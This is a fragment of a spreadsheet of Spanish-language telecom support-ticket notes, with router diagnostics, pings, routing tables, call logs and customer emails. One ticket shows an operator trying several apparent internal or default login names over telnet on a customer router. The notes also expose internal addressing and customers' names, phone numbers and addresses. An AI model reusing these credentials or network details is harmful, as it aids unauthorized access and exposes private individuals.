INTERNET  181.209.185.238         -   2C54.2D28.CF21  ARPA   GIGABITETHERNET0/1
INTERNET  186.151.234.81          -   0000.0C07.ACC8  ARPA   GIGABITETHERNET0/1
INTERNET  186.151.234.82          0   D4F4.BEAF.2217  ARPA   GIGABITETHERNET0/1
INTERNET  186.151.234.83         33   D4F4.BEAF.2217  ARPA   GIGABITETHERNET0/1
INTERNET  186.151.234.84        164   D4F4.BEAF.2217  ARPA   GIGABITETHERNET0/1
INTERNET  186.151.234.87        194   D4F4.BEAF.2217  ARPA   GIGABITETHERNET0/1
INTERNET  186.151.234.93          0   78DA.6E9C.05A1  ARPA   GIGABITETHERNET0/1
INTERNET  186.151.234.94          -   2C54.2D28.CF21  ARPA   GIGABITETHERNET0/1
CC_IMSA_GT_INTERNET_Z15#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
EM0/0                          ADMIN DOWN     DOWN
GI0/0                          UP             UP       WAN PRINCIPAL/_/54700042T/_/
GI0/1                          UP             UP       LAN DEL CLIENTE
LO5                            UP             UP       MONITOREO DEL CNOC
CC_IMSA_GT_INTERNET_Z15#
SHOW IP INT BRIEF
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0         10.31.74.118    YES NVRAM  UP                    UP
GIGABITETHERNET0/1         186.151.234.94  YES NVRAM  UP                    UP
LOOPBACK5                  10.212.111.56   YES NVRAM  UP                    UP
CC_IMSA_GT_INTERNET_Z15#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN INTERNET_GT_METRO 10.31.74.118
  PING 10.31.74.118: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.31.74.118 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
RUTA IP:
PE: 10.179.28.42
DISPLAY IP ROUTING-TABLE VPN-INSTANCE INTERNET_GT_METRO 10.31.74.118
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : INTERNET_GT_METRO
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.31.74.118/32  DIRECT  0    0                 0.0.0.0         VLANIF3008			</t>
  </si>
  <si>
    <t>F4629495</t>
  </si>
  <si>
    <t>F4629597</t>
  </si>
  <si>
    <t>SERVICIO  OPERATIVO SIN PERDIDAS NI LATENCIAS.
UNICENTRO#PIN  VRF PROMERICA 192.168.168.242
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 5, 100-BYTE ICMP ECHOS TO 192.168.168.242, TIMEOUT IS 2 SECONDS:
!!!!!
SUCCESS RATE IS 100 PERCENT (5/5), ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
PE 10.184.12..8
UNICENTRO#SHO IP ROUTE VRF PROMERICA 192.168.168.242
ROUTING TABLE: PROMERICA
ROUTING ENTRY FOR 192.168.168.240/30
  KNOWN VIA "CONNECTED", DISTANCE 0, METRIC 0 (CONNECTED, VIA INTERFACE)
  REDISTRIBUTING VIA OSPF 166, BGP 13682
  ADVERTISED BY BGP 13682
  ROUTING DESCRIPTOR BLOCKS:
  * DIRECTLY CONNECTED, VIA PORT-CHANNEL2.1455
      ROUTE METRIC IS 0, TRAFFIC SHARE COUNT IS 1
UNICENTRO#SHO RUN INT  PORT-CHANNEL2.1455
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 304 BYTES
!
INTERFACE PORT-CHANNEL2.1455
 DESCRIPTION PROMERICA MPLS 104MB CENTRAL CENTRICA PLAZA C-0201702402
 ENCAPSULATION DOT1Q 1455
 IP VRF FORWARDING PROMERICA
 IP ADDRESS 192.168.168.241 255.255.255.252
 IP OSPF MTU-IGNORE
 SERVICE-POLICY INPUT RESTRICCION_104M
 SERVICE-POLICY OUTPUT RESTRICCION_104M
END</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE PABLO GARCIA AL 30727797 CONTESTA  EL SEÑOR MARLON NAVAS CONFIRMA SERVICIO ESTABLE Y OPERATIVO || AUTORIZA CIERRE DE TICKET **
-ID 1001056624
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ENCARGADO AL 24139400 EXT 82650 NO RESPONDE || SE INTENTARA LUEGO **
-ID 1001038487
**</t>
  </si>
  <si>
    <t>F4629678</t>
  </si>
  <si>
    <t xml:space="preserve">SE PORCEDE A DEJAR EN ETAPAPENDIENTE CLIENTE Y SOLICITAR APOYO PARA PRUEBAS DE 1 ER NIVEL
SEGUN EL DISEÑIO NO SE LLEGA A ULTIMA MILLA ES NECESARIO VALIDAR TEMAS DE ENERGIA COMERCIAL CON EL CLIENTE  Y DESCARTE DE EQUIPOS PARA PODER VALIDAR LA FRIBR OPTICA YA QUE NO SE LLEGA AL CLIENTE PERO SI AL NODO
PING -Q -C 100 -S 100 -M 5 -VPN GESTION_CTC_UNION 10.105.32.68
  PING 10.105.32.68: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.105.32.68 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
RUTA IP:
PE: 10.179.28.93
DISPLAY IP ROUTING-TABLE VPN-INSTANCE GESTION_CTC_UNION 10.105.32.68
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : GESTION_CTC_UNION
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.105.32.68/32  DIRECT  0    0                 0.0.0.0         VLANIF239			
PING -M 10 -Q -VPN ADMIN_RAD_ISLAS 10.105.32.25
  PING 10.105.32.25: 56  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.105.32.25 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
RUTA IP:
PE: 10.179.28.93
DISPLAY IP ROUTING-TABLE VPN-INSTANCE ADMIN_RAD_ISLAS 10.105.32.25
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : ADMIN_RAD_ISLAS
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
    10.105.32.0/27  DIRECT  0    0             D   10.105.32.1     VLANIF115			</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5299  MENCIONA QUE YA OBSERVAN EL SERVICIO OPERATIVO PERO NO TIENEN GESTION DE LOS EQUIPOS PARA DESCARTAR SI NO FUE TEMA DE ENERGIA
SE NOTIFICARA PARA REALIZAR LAS VALIDACIONES
-ID 1001052183
&lt;KSCQGTSCN1C1B05B22EIM1&gt;PING -M 10 -Q -VPN BIMBO_GT 10.105.35.90
  PING 10.105.35.90: 56  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.105.35.90 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/2 MS</t>
  </si>
  <si>
    <t>F4629691</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ROSIO QUINTEROS 61290742 DEJA EN ESPERA Y NO RETOMA LA LLAMADA
-ID 1001195767</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ROSIO QUINTEROS AL 61290742 INDICA QUE ESTA EN SITIO EL TECNICO AUN VERIFICANDO YA QUE AUN NO FUNCIONA **
-ID 1001058085
**</t>
  </si>
  <si>
    <t>F4629698</t>
  </si>
  <si>
    <t>SE VE LEVANTADO A NIVEL WAN
&lt;AATISVZRN1D1EID1&gt;PIN -VP INTERNET_ID_ESV 10.152.44.41
  PING 10.152.44.41: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.152.44.41: BYTES=56 SEQUENCE=1 TTL=255 TIME=1 MS
    REPLY FROM 10.152.44.41: BYTES=56 SEQUENCE=2 TTL=255 TIME=1 MS
    REPLY FROM 10.152.44.41: BYTES=56 SEQUENCE=3 TTL=255 TIME=1 MS
    REPLY FROM 10.152.44.41: BYTES=56 SEQUENCE=4 TTL=255 TIME=1 MS
    REPLY FROM 10.152.44.41: BYTES=56 SEQUENCE=5 TTL=255 TIME=1 MS
  --- 10.152.44.41 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
&lt;AATISVZRN1D1EID1&gt;
PE 10.179.30.45
&lt;AATISVZRN1D1EID1&gt;DIS IP ROUTING-TABLE VP INTERNET_ID_ESV 10.152.44.41
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : INTERNET_ID_ESV
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.152.44.41/32  DIRECT  0    0                 0.0.0.0         VLANIF1035
&lt;AATISVZRN1D1EID1&gt;DIS CUR INTE VLANIF1035
#
INTERFACE VLANIF1035
 DESCRIPTION ID1410002 CSJ/6M_PPAL
 IP BINDING VPN-INSTANCE INTERNET_ID_ESV
 IP ADDRESS 10.152.44.42 255.255.255.252
#
RETURN</t>
  </si>
  <si>
    <t>NO SE TIENEN CREDENCIALES DEL EQUIPO CPE SE SOLICITA A SOC VALIDAR SI SE TIENE DATOS AL PARECER ES IN FORTINET  SE SOLICITA A SOC VALIDAR EL CLIENTE Y REVISAR FORTINET .
FORTINET	FG-40F		10.152.44.41	FGT40FTK22020214	FGT40FTK22020214	ACTIVA	08/06/2023 18:00:00
&lt;AATISVZRN1D1EID1&gt;PIN -VP INTERNET_ID_ESV 10.152.44.41
  PING 10.152.44.41: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.152.44.41: BYTES=56 SEQUENCE=1 TTL=255 TIME=1 MS
    REPLY FROM 10.152.44.41: BYTES=56 SEQUENCE=2 TTL=255 TIME=1 MS
    REPLY FROM 10.152.44.41: BYTES=56 SEQUENCE=3 TTL=255 TIME=1 MS
    REPLY FROM 10.152.44.41: BYTES=56 SEQUENCE=4 TTL=255 TIME=1 MS
    REPLY FROM 10.152.44.41: BYTES=56 SEQUENCE=5 TTL=255 TIME=1 MS
  --- 10.152.44.41 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
&lt;AATISVZRN1D1EID1&gt;TELNET VP INTERNET_ID_ESV 10.152.44.41
TRYING 10.152.44.41 ...
PRESS CTRL+K TO ABORT
CONNECTED TO 10.152.44.41 ...
CC_CSJ_SV_INTERNET_TURIN LOGIN:
INFO: THE CONNECTION WAS CLOSED BY THE REMOTE HOST.
&lt;AATISVZRN1D1EID1&gt;TELNET VP INTERNET_ID_ESV 10.152.44.41
TRYING 10.152.44.41 ...
PRESS CTRL+K TO ABORT
CONNECTED TO 10.152.44.41 ...
CC_CSJ_SV_INTERNET_TURIN LOGIN:
INFO: THE CONNECTION WAS CLOSED BY THE REMOTE HOST.
&lt;AATISVZRN1D1EID1&gt;TELNET VP INTERNET_ID_ESV 10.152.44.41
TRYING 10.152.44.41 ...
PRESS CTRL+K TO ABORT
CONNECTED TO 10.152.44.41 ...
CC_CSJ_SV_INTERNET_TURIN LOGIN: T3LN0CR3D3S
PASSWORD:
LOGIN INCORRECT
CC_CSJ_SV_INTERNET_TURIN LOGIN: T3LN0C2008
PASSWORD:
INFO: THE CONNECTION WAS CLOSED BY THE REMOTE HOST.
&lt;AATISVZRN1D1EID1&gt;TELNET VP INTERNET_ID_ESV 10.152.44.41
TRYING 10.152.44.41 ...
PRESS CTRL+K TO ABORT
CONNECTED TO 10.152.44.41 ...
CC_CSJ_SV_INTERNET_TURIN LOGIN: N0CAZT3C@
PASSWORD:
LOGIN INCORRECT
CC_CSJ_SV_INTERNET_TURIN LOGIN: CISCO
PASSWORD:
LOGIN INCORRECT
LOGIN DISABLED
INFO: THE CONNECTION WAS CLOSED BY THE REMOTE HOST.
&lt;AATISVZRN1D1EID1&gt;</t>
  </si>
  <si>
    <t>F4629704</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSE MONTERROSA 78027898 SOLICITA SE PUEDA COMPARTIR LAS PRUEBAS POR CORREO
JOSE.MONTERROSA@OJ.GOB.SV
-ID 1001049172</t>
  </si>
  <si>
    <t>F4629707</t>
  </si>
  <si>
    <t>F4629749</t>
  </si>
  <si>
    <t>CLIENTE REBEA GOMEZ 51666160 REALIZA PRUEBAS DE LLAMADAS ENTRANTES Y SALIENTES Y VALIDA EL E1 ACTIVO, AUTORIZA EL CIERRE DEL CASO. ID: 1001047011</t>
  </si>
  <si>
    <t>F4629784</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MIRNA CARTEGENA 76260434 CONFIRMA SERVICIO ESTABLE Y OPERATIVO**
-ID 1001060979
**</t>
  </si>
  <si>
    <t>F4629798</t>
  </si>
  <si>
    <t>SE LLAMO A CLIENTE JONATHAN SURUY-30138679 ##VIVO ## NO CONTESTA- #MANDA DIRECTO A BUZON</t>
  </si>
  <si>
    <t>F4629806</t>
  </si>
  <si>
    <t>CLIENTE  EMMANUEL CASTAÑAZA  VALIDA QUE E1 YA ESTA OPERATIVO, SE PROCEDE AL CIERRE DEL CASO.
1001039259
COLA:
NOMBRE: 22153693
NÚMERO: 22153693
DURACIÓN: 0:01:14
ESTADO: CONECTADA
DETALLES: 22153693
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 6/07/2022 08:16:27</t>
  </si>
  <si>
    <t>F4629807</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDNA ROJAS AL 42601984  CONFIRMA SERVICIO ESTABLE Y OPERATIVO**
-ID 1001044227
**</t>
  </si>
  <si>
    <t>F4629835</t>
  </si>
  <si>
    <t>SE ENVIA CORREO.A CL-</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE.</t>
  </si>
  <si>
    <t>F4629842</t>
  </si>
  <si>
    <t>*- SE ESTA CONSULTANDO CON PERSONAL DE CNOC VIA TEAMS SI CUENTAN CON ALGUN AVANCE, AL PENDIENTE DE LAS GRAFICAS PARA PODERLAS COMPARTIR CON EL CLIENTE, DE MOMENTO NO APLICA ESTADO PC, SE CAMBIA A WP *-
-*</t>
  </si>
  <si>
    <t>F4629850</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. ALEJANDRO ESPINOZA 87104508 SE CONFIRMA QUE EL ENLACE AFECTADO ES SU PUNTO CENTRAL PRODUCTO OPEN: 621684, PROCEDE A SOLICITAR NUEVO INCIDENTE, AUTORIZA CIERRE PARA LOS PUNTOS REMOTOS REPORTADOS.</t>
  </si>
  <si>
    <t>F4629884</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE--
RE: C165 ¿ SERVICIO DE DATOS E INTERNET CLARO - ID 625900015; 38300507; INTERNET 38300559</t>
  </si>
  <si>
    <t>F4629889</t>
  </si>
  <si>
    <t>SE ENVIAN GRAFICAS A CLIENTE POR CORREO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 6 DE JULIO DE 2022 9:39
PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; WALTER ANIBAL REYES &lt;WALTER.REYES@SOMOSCMI.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
CC: HELPDESK@CAMPERO.COM &lt;HELPDESK@CAMPERO.COM&gt;; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;
ASUNTO: RE: C165 ¿ SERVICIO DE DATOS E INTERNET CLARO - ID 625900015; 38300507; INTERNET 38300559
BUEN DÍA
    ESTIMADO CLIENTE DANDO SEGUIMIENTO AL CASO 38300507T -   SD1141598, SOLICITAMOS DE SU APOYO VALIDANDO COMO OBSERVA EL SERVICIO ACTUALMENTE, YA QUE EL MISMO SE ENCUENTRA OPERATIVO Y ESTABLE.
GRAFICAS DE CONSUMO
QUEDAMOS ATENTOS A SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4629903</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SRTA. ELENA SALAZAR 76004371 SOLICITA REGRESAR LA LLAMADA A LAS 10 AM, SE MOVILIZARA AL SITIO PARA REVISAR LOS EQUIPOS INTERNOS. ID: 1001057230.</t>
  </si>
  <si>
    <t>F4629909</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 72559726 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001066446</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JORGE ALVARADO 70381145 MENCIONA NUMERO EQUIVOCADO
-ID 1001065717</t>
  </si>
  <si>
    <t>F4629918</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  MARIO SOLIS 59691598 MENCIONA QUE PERSISTE EL PROBLEMA, SE LE MENCIONA QUE NO SE OBSERVA PROBLEMA A NIVEL DE CLARO
SE NOTIFICARA PARA EL SEGUMIENTO
-ID 1001068296</t>
  </si>
  <si>
    <t>**  MARIO SOLIS 59691598 (CLIENTE) ERICK, INFORMA QUE REALIZAN PRUEBAS DE SPEEDTEST Y EN LAS MISMAS NO ALCANZA EL ANCHO DE BANDA, COMENTA QUE REALIZARÁ LA CONEXION DIRECTA AL CPE CISCO YA QUE LAS PRUEBAS ANTERIORES LAS REALIZO DIRECTO A SU SW, SE DEJA EN CONFERENCIA CON WAGNER POLANCO (GESTOR)  PARA CONTINUAR CON LAS PRUEBAS -*
-*</t>
  </si>
  <si>
    <t>F4629932</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS RIVERA-55662572  ##  INDICA QUE SERVICIO ESTA UP- PERO QUE REPORTABA DE QUE UNA LUZ LED ESTABA EN ROJO. ## SE LE COMENTA QUE ESO ES NORMAL CUANDO EL EQUIPO AVISA QUE PBX ESTA GENERANDO ERRORES- CLIENTE VALIDA CIERRRE##VVIO ## NOTA: PBX GENERA ERRORES SEGUN TICKET ANTERIOR DONDE SE CERTIFICO.
1001061546
COLA:
NOMBRE: A: 55662572
NÚMERO: 55662572
DURACIÓN: 0:02:55
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 55662572
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 6/07/2022 09:34:23</t>
  </si>
  <si>
    <t>F4629934</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. AMILCAR CRUZ 3342-1997 CLIENTE NO CONTESTO, IVR ENVIA A BUZON.</t>
  </si>
  <si>
    <t>F4629940</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ARTURO MENDEZ 85106997 PARA BRINDAR RETROALIMENTACION
-ID 1001084557</t>
  </si>
  <si>
    <t>F4629941</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VICTOR MANUEL SUAREZ 54011350 MENCIONA QUE YA APLICARON REINICIO A LOS EQUIPOS PERO EL INCONVENIENTE PERSISTE
CLIENTE INDICA QUE EL PROBLEMA ESTA EN LA CENTRAL PERO NO ESTA MUY SEGURO, INFORMA QUE TIENE CAIDA TOTAL DESDE HACE 12 DIAS
-ID 1001061709
UBICACIÓN:26 CALLE 14-30 Z.11 ATRAS DEL HOSPITAL HERMANO PEDRO
CONTACTO EN SITIO: VICTOR MANUEL SUAREZ 54011350
HORARIO DE ATENCION:14:00 - 15:30
GESTIÓN DE PERMISOS: UNICAMENTE LLAMAR AL NUMERO 54011350</t>
  </si>
  <si>
    <t>F4629943</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE--</t>
  </si>
  <si>
    <t>SE ENVIA CORREO
RE: CAÍDA DE ENLACES DE DATOS COOP. "EL NEGRITO" DOS FILIALES</t>
  </si>
  <si>
    <t>F4629947</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 77767065 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001088331</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDILBERTO CASTILLO  AL 55882636  SE CONTACTA A CLIENTE PERO CORTA LLAMADA || SE INTENTARA LUEGO **
-ID 1001099014
**</t>
  </si>
  <si>
    <t>F4629948</t>
  </si>
  <si>
    <t>SE LLAMA A LCIENTE JORGE ELIAS 25278555 SE DEJA EN CONFERENCIA CON GESTOR
-ID 1001089337</t>
  </si>
  <si>
    <t>F4629954</t>
  </si>
  <si>
    <t>SE RECIBE LLAMAD DE TECNICO Y CCR SE VALIDA QUE TECNICOS YA SE ENCUENTRA EN SITIO, SE LLAMA A CLIENTE ARLDON Y SE VALIDA PERSMISOS, COMENTA QUE YA SE PUEDA PROCEDER CON LA VISITA, SE APERTURA WO
3001804972
COLA:
NOMBRE: A: 58260348
NÚMERO: 58260348
DURACIÓN: 0:08:18
ESTADO: CONECTADA
DETALLES: 58260348
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 4/07/2022 18:45:39</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ARNOLD CABALLERO AL 31850297 Y BRINDA LOS SIGUIENTES DATOS PARA VISITA**
HORARIO DE ATENCION: 7:00 A 22:00 HRS
GESTION DE PERMISOS: SE NECESITAN PERMISOS ENVIAR CORREO  NOTIFICACION@FARMACIASIMAN.NET
DIRECCCION: CALLE PRINCIPAL SITUADO EN LOCAL EXTERIOR DEL SUPERMERCADO MÁRQUEZ, CONTIGUO A SUPERMERCADO MÁRQUEZ
ATENDERA EN SITIO: NO TIENE NOMBRE SOLO INDICA QUE ES AGENTE DE TIENDA
ID 1001079925
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 504 3363-6582 - 504 2544-2000 NO RESPONDE || SE INTENTARA LUEGO **
-ID 1001077115 - 1001077744
**</t>
  </si>
  <si>
    <t>F4629976</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ENRIQUE VENTURA  AL 75405749 NO RESPONDE || ENVIA A BUZON SE INTENTARA LUEGO**
-ID 1001095330
**</t>
  </si>
  <si>
    <t>F4629978</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PARA REALIZAR PRUEBAS EN CONJUNTO SIN EMBARGO SOLICITA LLAMADA A LAS 13:30 HORAS.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSE ARMANDO AL 60324552 INDICA QUE POR EL MOMENTO ESTA ESTABLE PERO SOLICITA QUE SE REALIZEN PRUEBAS SIEMPRE EN CONJUNTO || SE NOTIFICA A GESTOR **
-ID 1001197071
**</t>
  </si>
  <si>
    <t>SE LLAMARA A CLIENTE A PRIMERA HORA-</t>
  </si>
  <si>
    <t>F4629979</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FERNANDO DE LEON 40065874 MENCIONA QUE EL INCONVENIENTE ES QUE NO LLEGA AL ANCHO DE BANDA CONTRATADO, SE DEJA EN CONFERENCIA CON GESTOR
-ID 1001078774 - 1001081331</t>
  </si>
  <si>
    <t>F4629987</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ENRIQUE VENTURA 75405749 A QUIEN SE LE BRINDA EL DIAGNOSTICO DEL SERVICIO
CLIENTE MENCIONA QUE EN PR ESTAN TRABAJANDO CON PLANTA PORQUE NO CUENTAN CON ENERGIA EN PR
SE LE MENCIONA QUE SE LE ENVIARAN LAS PRUEBAS POR CORREO
ENRIQUE.VENTURA@CCLAUNION.COM
-ID 1001075565</t>
  </si>
  <si>
    <t>F4629990</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MAURICIO GOMES-77476386  ##SE TIENE EN LINEA ""
1001070354
COLA:
NOMBRE: A: 0050377476386
NÚMERO: 0050377476386
DURACIÓN: 0:00:06
ESTADO: MARCANDO
DETALLES: 0050377476386
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 6/07/2022 09:57:22</t>
  </si>
  <si>
    <t xml:space="preserve"> DENNIS SORTO-77477605  COMENTA QUE EL PROBLEMA FUE LA SEMANA PASADA Y NO  ESTA SEMANA.  CLIENTE INDICA QUE SE QUEJO CON SU EJECUTIVO Y QUE ESTA SEMANA NO HA ATENIDO FALLO## BOLETA MAL ABIERTA##
RESULTADO: LLAMADA HECHA
NOMBRE: 0050377477605
NÚMERO: 0050377477605
INICIO: HOY, 10:01
FIN: HOY, 10:06
DURACIÓN: 4:38
ID DE LLAMADA: 1001071749</t>
  </si>
  <si>
    <t>F4630001</t>
  </si>
  <si>
    <t>** SELVIN ISRAEL FUENTES RAMÍREZ 4987 2286 (CLIENTE) NO RESPONDE, SE LLAMARA LUEGO
1001111059
1001111246</t>
  </si>
  <si>
    <t>F4630022</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 22437253 PARA SEGUIMIENTO Y/O VALIDAR SERVICIO, NO CONTESTA; SE DEBE INTENTAR MÁS TARDE; CLIENTE ENVIÓ CORREO AUTORIZANDO EL CIERRE, SE PROCEDE:
DE: NOE PEREZ (VENDOR) [MAILTO:NOE.PEREZ1@WALMART.COM]
ENVIADO EL: MIÉRCOLES, 6 DE JULIO DE 2022 14:16
ASUNTO: RE: EXT: RE: ENLACE CAÍDO DE DA-NI-PLANTA-INDUSTRIAS CARNICAS-ICI-CONDEGA ID: 4584236
BUENAS TARDES,
GRACIAS POR EL APOYO FAVOR DE PROCEDER AL CIERRE DEL CASO
SALUDOS</t>
  </si>
  <si>
    <t>F4630072</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EN CENTRAL, SE LE COMENTA QUE NO HAY ENERGIA EN SITIO, SE VALIDARA MAS TARDE
1001164537
COLA:
NOMBRE: CONFERENCIA
NÚMERO: 4818
DURACIÓN: 0:00:49
ESTADO: CONECTADA
DETALLES: 4818
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 6/07/2022 14:51:08</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RAMON VELASQUEZ 7967-1526 PERO ESTE ENVIA  A BUZON..</t>
  </si>
  <si>
    <t>F4630080</t>
  </si>
  <si>
    <t xml:space="preserve">
POSIBLE FALLA DE ENERGIA
SE CONSULTA CON PERSONAL DE MONITOREO DE BANCO AZTECA SOBRE EL ESTADO DE LA AGENCIA
NO SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE CAÍDO.
PING HACIA ROUTER CPE:
PING -M 10 -Q -VPN ELEKTRADATOS 10.72.158.118
  PING 10.72.158.118: 56  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.72.158.118 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
RUTA IP:
PE: 10.179.28.31
DISPLAY IP ROUTING-TABLE VPN-INSTANCE ELEKTRADATOS 10.72.158.118
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : ELEKTRADATOS
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.72.158.112/29  DIRECT  0    0             D   10.72.158.113   VLANIF339			</t>
  </si>
  <si>
    <t>F4630085</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE OSWALDO CUELLAR O NESTOR CARRANZA 79855212 QUIEN ESTA ENTERADO DE LA VISITA PARA MAÑANA JUEVES, SOLICITA LA VISITA PARA LAS 8 HRS
1001205497
COLA:
NOMBRE: A: 0050379855212
NÚMERO: 0050379855212
DURACIÓN: 0:01:53
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 0050379855212
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 6/07/2022 17:15:00
ASUNTO: VISITA TÉCNICA IP2145198 / BANCO HIPOTECARIO DE EL SALVADOR / SAN MIGUEL
ERITO FERNANDO TECU XITUMUL
BUENA TARDE ESTIMADOS.
EN SEGUIMIENTO AL SERVICIO REPORTADO IP2145198 / BANCO HIPOTECARIO DE EL SALVADOR / SAN MIGUEL BO. SAN FELIPE 6A. CALLE PTE S/N Y AV.ROOSEVELTH.
